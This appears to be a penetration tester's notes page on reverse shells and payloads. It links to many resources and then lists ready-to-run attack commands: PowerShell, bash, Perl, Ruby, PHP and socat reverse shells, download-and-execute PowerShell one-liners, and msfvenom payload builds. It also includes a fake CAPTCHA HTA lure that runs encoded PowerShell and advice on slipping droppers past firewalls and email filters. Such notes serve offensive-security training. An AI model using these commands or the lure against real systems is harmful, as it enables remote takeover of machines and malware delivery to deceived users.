Shell & Payloads

Resources

• Core Deep Dive
  • Emulator vs Simulator : https://www.racksolutions.com/news/blog/what-is-the-difference-between-emulator-and-simulator/ || https://katalon.com/resources-center/blog/simulator-emulator-real-device
  • mkfifo : https://hopeness.medium.com/master-the-linux-mkfifo-command-a-comprehensive-guide-7e64ac926228
  • Terminal Emulators
    • Linux
      • xterm : https://invisible-island.net/xterm/
      • Gnome_Terminal : https://en.wikipedia.org/wiki/GNOME_Terminal
      • Mate : https://github.com/mate-desktop/mate-terminal
    • Windows
      • Terminal : https://github.com/microsoft/terminal
      • cmder : https://cmder.app/
      • Putty : https://www.putty.org/
    • Mac
      • Konsole : https://apps.kde.org/konsole/
      • Terminal : https://en.wikipedia.org/wiki/Terminal_(macOS)
      • iterm2 : https://iterm2.com/index.html
    • All in one
      • Kitty : https://sw.kovidgoyal.net/kitty/
      • Alacritty : https://github.com/alacritty/alacritty
  • What is TTY : https://www.xcitium.com/blog/news/what-is-tty/ || https://www.reddit.com/r/linuxquestions/comments/oikda1/what_the_hell_is_tty/ || https://www.linusakesson.net/programming/tty/index.php?ref=itsfoss.com || https://itsfoss.com/what-is-tty-in-linux/
  • Conpty : https://devblogs.microsoft.com/commandline/windows-command-line-introducing-the-windows-pseudo-console-conpty/
  • What is HTA : https://medium.com/@anht_59851/html-application-hta-a-gui-for-your-scripting-on-windows-bfaacf2c3bdd
  • Source : https://superuser.com/questions/46139/what-does-source-do
• Exploitation
  • By bughra : https://bughra.dev/posts/shell/
  • By nerdgigs : https://nerdgigs.blog/2025/03/25/beyond-dumb-shells-mastering-reverse-shell-stabilization/
  • By ropnop : https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
  • By asifnawazminhas : https://www.asifnawazminhas.com/posts/Upgrading-tty-shell/
  • Staged vs Stagless : https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html || https://buffered.io/posts/staged-vs-stageless-handlers/ || https://blog.spookysec.net/stage-v-stageless-1/ || https://www.illumio.com/blog/types-malicious-payloads
  • By offsec : https://www.offsec.com/metasploit-unleashed/payloads/ ||
  • By hackingarticles : https://www.hackingarticles.in/powershell-for-pentester-windows-reverse-shell/ || https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
  • By amanuthkhedkar : https://amanutkhedkar.medium.com/edr-is-not-enough-2702d4e30387
  • By mosunit : https://mosunit.com/?p=202
  • By jason Ostrom : https://infosecwriteups.com/fun-with-creating-a-vbs-payload-to-bypass-endpoint-security-and-other-layers-44afd724de1b
  • By hackersploit : https://www.youtube.com/watch?v=0W3Z3Br56XM
  • By habr : https://habr.com/ru/articles/868622/
  • By hypothintical : https://hypothetical.me/post/reverse-shell-in-bash/
  • By gnucitizen : https://www.gnucitizen.org/blog/reverse-shell-with-bash/
  • By securixy : https://securixy.kz/hack-faq/apgrejd-reverse-shell-do-interaktivnogo-tty.html/
• Detection
  • TTY : https://detection.fyi/elastic/detection-rules/linux/execution_interpreter_tty_upgrade/
• News
  • WSL malware : https://www.bleepingcomputer.com/news/security/new-malware-uses-windows-subsystem-for-linux-for-stealthy-attacks/
  • FACCT : https://habr.com/ru/companies/F6/articles/847884/
  • From X : https://x.com/0xJin/status/1951573750551285948
  • Fake Captcha Lumma infostealer : https://www.youtube.com/watch?v=ixX8xJCQWoI || https://denwp.com/dissecting-lumma-malware/ || https://denwp.com/anatomy-of-a-lumma-stealer/ || https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Cheat sheet

• swisskyrepo : https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/
• Pentestmonkey : https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
• StationX : https://www.stationx.net/reverse-shell-cheat-sheet/
• 0b1d1 : https://x.com/_0b1d1/status/1951672279341101080
• ired.team : https://www.ired.team/offensive-security/code-execution
• Nol white hat : https://infosecwriteups.com/windows-reverse-shell-that-almost-always-works-2aab514f820f
• Pentestmonkey : https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
• securixy : https://securixy.kz/hack-faq/reverse-shell-ili-bjekkonnekt.html/
• PSSW100AVB : https://github.com/tihanyin/PSSW100AVB
• IGNITE :

Commnads

• Shells
  • Windows
    • Nikal Powershell oneliner

      $client = New-Object System.Net.Sockets.TCPClient('192.168.99.23',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

    • Conptyshell

      # Attacker 
      stty raw -echo; (stty size; cat) | nc -lvnp 7777
       
      # Victum
      iex (New-Object Net.Webclient).DownloadString("http://192.168.99.23/Invoke-ConPtyShell.ps1"); Invoke-ConPtyShell 192.168.99.23 7777

    • Invoke-PowerShellTCP

      powershell -ep bypass "IEX(New-Object Net.WebClient).DownloadString('http://192.168.99.23/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.99.23 -Port 4444"

    • Powercat

      IEX(New-Object Net.WebClient).DownloadString('http://192.168.99.23/powercat.ps1')
      powercat -c 192.168.99.23 -p 1234 -ep
      powercat -c 192.168.99.23 -p 1234 -e cmd
      powercat -l -p 1234 -ep

    • MSF

      # EXE
      msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.99.23 LPORT=4444 -f exe > meterpreter.exe # Then to the use exploit/multi/handler
      # PS1
      msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.99.23 LPORT=4444 -f psh > Payload.ps1
      powershell -ep bypass -f payload.ps1
      powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.99.23/payload.ps1')"
       
      # Batch 
      msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat
      # HTA (https://gist.github.com/iknowjason/08d452e059ec43fa4efdb59ddb0da3e7)
      use exploit/windows/misc/hta_server
      mshta.exe http://192.168.99.23:8080/5uODZ5KLqsLXS.hta
      # MSI
      msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi
      msiexec /q /i http://192.168.1.109/1.msi
       
      # Handler 
      use exploit/multi/script/web delivery

      • Sample HTA Payload

        <html>
        <head>
        <title>Verify you are human</title>
        <HTA:application
        applicationname="CAPTCHA"
        border="thin"
        borderstyle="complex"
        caption="yes"
        showintaskbar="yes"
        windowstate="normal"
        />
         
        <script language="VBScript">
        Set objShell = CreateObject("Wscript.Shell")
        objShell.Run "powershell -e JABjAKQA=" , 0, False
        </script>
        </head>
        <body style="background-color: black; color:white; text-align:center; font-family:'Consolas';" >
        <h2>CAPTCHA</h2>
        <img
          src="https://photo"
          style="width:400px; border:2px solid white; margin-top:20px;"
          alt="Hackerman loading....">
        <p><i>Please check Your Netcat</i></p>
        </body>
        </html>

  • Linux
    • MSF

      msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.99.23 LPORT=4444 -f elf > meterpreter.elf # Then to the use exploit/multi/handler
       
      use exploit/multi/script/web delivery

    • Bash

      # Mkfifo
      rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l -p 7777 > /tmp/f
      rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 192.168.99.24 7777 > /tmp/f
      Attacker input → nc → pipe → bash → nc → attacker output.
       
      rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | (exec 3<>/dev/tcp/10.129.41.200/7777; cat >&3; cat <&3 > /tmp/f)
       
      # Redirection 
      bash -i >& /dev/tcp/192.168.99.23/1234 0>&1
       
      # Bash TCP
      exec 5<>/dev/tcp/192.168.99.23/1234
      cat <&5 | while read line; do $line 2>&5 >&5; done
      # Tips & Tricks 
      	# Find if the port is used 
      fuser -k 46840/tcp
      	# Evasion
      echo "base64" | base64 -d | /bin/bash

  • Generators
    • tex2e
    • revshells
• TTY
  • Programming

    # Recon
    which python python2 python3 perl ruby php wsh bash sh
     
    # Python 2.x
    python -c 'import pty; pty.spawn("/bin/bash")'
    # Python 3.x
    python3 -c 'import pty; pty.spawn("/bin/bash")'
    # Perl 
    perl -e 'use Socket;$i="192.168.99.23";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
    # Ruby 
    ruby -rsocket -e'f=TCPSocket.open("192.168.99.23",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    # PHP
    php -r '$sock=fsockopen("192.168.99.23",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
    # sh
    /bin/sh -i

  • Socat

    # Victum
    ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.99.23:4444
     
    # Attacker 
    socat file:`tty`,raw,echo=0 tcp-listen:4444

  • Post TTY

    # Stablish 
    script -q -c /bin/bash /dev/null
    # Press Ctrl+Z to background the shell
     
    stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
    # Disable local output in terminal
    stty raw -echo; fg
    # Press Enter twice
    reset
    # Set rows and columns for proper text aligning
    stty rows ${ROWS} cols ${COLS}
    # For CTRL-L to work
    export TERM=xterm / xterm-color / xterm-256color
    # (optional) Get Bash new process image
    exec /bin/bash -l

  • script

    script -q -c /bin/bash /dev/null

  • rlwrap

    rlwrap nc -lvnp 4444

  • Shell 2 meterpreter

    # In Metasploit, after getting a basic shell:
    use post/multi/manage/shell_to_meterpreter
    set SESSION 1  # Replace with your session ID
    set LHOST ATTACKER_IP
    set LPORT 4433
    run

  • Tmux

    tmux new-session -s hack
    tmux attach -t hack

  • Screen

    screen -S hack
    screen -r hack

  • penelop

    pipx install git+https://github.com/brightio/penelope
    penelope -p 4444
    
    run peass_ng
    

  • Pwncat

    pwncat 192.168.99.25 1234
    pwncat -l 1234

  • xxh

    pipx install xxh-xxh
    xxh root@192.168.99.24 +s zsh +I xxh-plugin-zsh-ohmyzsh +if +q 
    ssh root@192.168.99.24 -f 'rm -rf .xxh'

Tools

• rlwrap : https://github.com/hanslub42/rlwrap
• Contpyshell : http://github.com/antonioCoco/ConPtyShell
• Invoke-powershellTCP : https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
• penelop : https://github.com/brightio/penelope
• revshells : https://www.revshells.com/
• revshellgen : https://github.com/t0thkr1s/revshellgen
• powercat : https://github.com/besimorhino/powercat
• laudanum : https://github.com/jbarcia/Web-Shells/tree/master/laudanum
• Pwncat : https://github.com/calebstewart/pwncat
• revshell by powershellforhackers : https://powershellforhackers.com/tools/revshell/
• Powershell deobfuscator : https://minusone.skyblue.team/
• shells-revs-red : https://github.com/dmore/shells-revs-red
• unicorn : https://github.com/trustedsec/unicorn/
• veil : https://github.com/Veil-Framework/Veil
• java parser : https://web.archive.org/web/20211009170720/http://www.jackson-t.ca/runtime-exec-payloads.html
• xxh : https://github.com/xxh/xxh

Notes

Don't use rlwrap with Post TTY section

If you know there is aggressive NGFW and Email Filters, don’t burn your whole payload. Burn a dropper. It’s much easier to recompile your dropper and obfuscate the small portion of code that is being flagged than it is to re-encode your shellcode and write a new decoding function for your stageless payload.

Staged vs Stageless